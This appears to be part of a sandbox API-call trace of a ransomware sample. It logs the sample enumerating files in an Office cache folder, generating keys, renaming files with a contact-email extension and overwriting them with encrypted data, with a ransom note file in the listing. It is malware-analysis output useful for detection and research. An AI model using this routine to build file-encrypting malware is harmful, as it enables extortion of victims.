	[0068.229] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.229] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.229] GetLastError () returned 0x0
	[0068.230] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.230] GetLastError () returned 0x0
	[0068.230] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.230] GetLastError () returned 0x0
	[0068.230] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.230] GetLastError () returned 0x0
	[0068.230] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.230] GetLastError () returned 0x0
	[0068.230] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0068.230] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.230] GetLastError () returned 0x0
	[0068.231] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0068.231] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0068.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0068.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588f80
	[0068.231] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0068.231] GetLastError () returned 0x0
	[0068.231] FindNextFileW (in: hFindFile=0x5da0f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9e79670, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9e79670, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e79670, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0068.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db430
	[0068.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0068.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0068.231] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0068.231] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0068.231] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0068.231] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0068.231] GetProcessHeap () returned 0x540000
	[0068.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5db4d8
	[0068.231] lstrcpyW (in: lpString1=0x5db4d8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0068.231] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0068.231] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0068.236] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468
	[0068.236] GetProcessHeap () returned 0x540000
	[0068.236] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4d8 | out: hHeap=0x540000) returned 1
	[0068.236] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=4207) returned 1
	[0068.237] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x106f
	[0068.237] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0068.237] GetProcessHeap () returned 0x540000
	[0068.237] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0068.237] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0068.237] WriteFile (in: hFile=0x468, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0068.239] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0068.239] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0068.239] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106f) returned 0x5db4d8
	[0068.239] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106f) returned 0x5dc550
	[0068.239] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.239] ReadFile (in: hFile=0x468, lpBuffer=0x5db4d8, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db4d8*, lpNumberOfBytesRead=0x3a1f778*=0x106f, lpOverlapped=0x0) returned 1
	[0068.240] SetFilePointer (in: hFile=0x468, lDistanceToMove=-4207, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.240] WriteFile (in: hFile=0x468, lpBuffer=0x5dc550*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dc550*, lpNumberOfBytesWritten=0x3a1f778*=0x106f, lpOverlapped=0x0) returned 1
	[0068.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db4d8 | out: hHeap=0x540000) returned 1
	[0068.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dc550 | out: hHeap=0x540000) returned 1
	[0068.240] CloseHandle (hObject=0x468) returned 1
	[0068.241] GetProcessHeap () returned 0x540000
	[0068.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0068.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0068.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0068.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db430 | out: hHeap=0x540000) returned 1
	[0068.241] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0068.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db388
	[0068.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0068.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0068.241] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0068.241] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0068.241] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", dwFileAttributes=0x80) returned 1
	[0068.241] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 78
	[0068.241] GetProcessHeap () returned 0x540000
	[0068.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5db430
	[0068.241] lstrcpyW (in: lpString1=0x5db430, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml"
	[0068.242] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0068.242] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0068.243] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468
	[0068.244] GetProcessHeap () returned 0x540000
	[0068.244] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db430 | out: hHeap=0x540000) returned 1
	[0068.244] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3186) returned 1
	[0068.244] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xc72
	[0068.244] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0068.244] GetProcessHeap () returned 0x540000
	[0068.244] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0068.244] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0068.244] WriteFile (in: hFile=0x468, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0068.245] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0068.246] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0068.246] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc72) returned 0x5db430
	[0068.246] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc72) returned 0x5dc0b0
	[0068.246] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.246] ReadFile (in: hFile=0x468, lpBuffer=0x5db430, nNumberOfBytesToRead=0xc72, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db430*, lpNumberOfBytesRead=0x3a1f778*=0xc72, lpOverlapped=0x0) returned 1
	[0068.246] SetFilePointer (in: hFile=0x468, lDistanceToMove=-3186, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.246] WriteFile (in: hFile=0x468, lpBuffer=0x5dc0b0*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5dc0b0*, lpNumberOfBytesWritten=0x3a1f778*=0xc72, lpOverlapped=0x0) returned 1
	[0068.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db430 | out: hHeap=0x540000) returned 1
	[0068.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5dc0b0 | out: hHeap=0x540000) returned 1
	[0068.246] CloseHandle (hObject=0x468) returned 1
	[0068.247] GetProcessHeap () returned 0x540000
	[0068.247] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0068.247] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0068.247] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0068.247] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0068.247] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db2e0 | out: hHeap=0x540000) returned 1
	[0068.247] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5db2e0
	[0068.247] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0068.247] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0068.247] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0068.247] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0068.247] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", dwFileAttributes=0x80) returned 1
	[0068.247] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 78
	[0068.247] GetProcessHeap () returned 0x540000
	[0068.247] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5db388
	[0068.247] lstrcpyW (in: lpString1=0x5db388, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi"
	[0068.247] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0068.248] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0068.250] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468
	[0068.250] GetProcessHeap () returned 0x540000
	[0068.250] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db388 | out: hHeap=0x540000) returned 1
	[0068.250] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2865664) returned 1
	[0068.250] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2bba00
	[0068.250] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0068.250] GetProcessHeap () returned 0x540000
	[0068.250] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0068.250] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0068.250] WriteFile (in: hFile=0x468, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0068.252] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0068.252] WriteFile (in: hFile=0x468, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0068.252] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2bba00) returned 0x3a20020
	[0068.253] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2bba00) returned 0x3ce0020
	[0068.253] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0068.253] ReadFile (in: hFile=0x468, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x2bba00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x2bba00, lpOverlapped=0x0) returned 1
	[0068.437] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0068.437] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0068.437] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", dwFileAttributes=0x80) returned 1
